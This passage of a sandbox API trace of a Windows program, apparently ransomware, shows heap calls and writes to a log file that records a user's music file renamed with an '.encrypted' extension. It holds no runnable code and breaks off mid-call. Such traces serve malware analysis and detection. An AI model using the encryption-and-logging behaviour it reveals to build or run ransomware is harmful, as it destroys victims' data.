wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0038.186] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.186] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.186] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.186] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.187] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.187] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0038.187] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.187] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2494, lpOverlapped=0x0) returned 1 [0038.187] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.187] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x2494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.187] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0038.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.encrypted.mp3\r\n", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0038.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x46) returned 0x88e138 [0038.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.encrypted.mp3\r\n", cchWideChar=70, lpMultiByteStr=0x88e138, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\__Hn.encrypted.mp3\r\n", lpUsedDefaultChar=0x0) returned 70 [0038.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0038.187] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0038.187] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0038.187] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x45, lpOverlapped=0x0) returned 1 [0038.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0038.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0038.188] CloseHandle (hObject=0x140) returned 1 [0038.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.189] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.189] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0038.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.190] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.190] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.190] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.190] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.190] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.190] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0038.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8896b8 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.191] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0038.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0038.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0038.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.191] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.192] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0038.193] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.193] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0038.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.194] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0038.195] HeapFree (in: 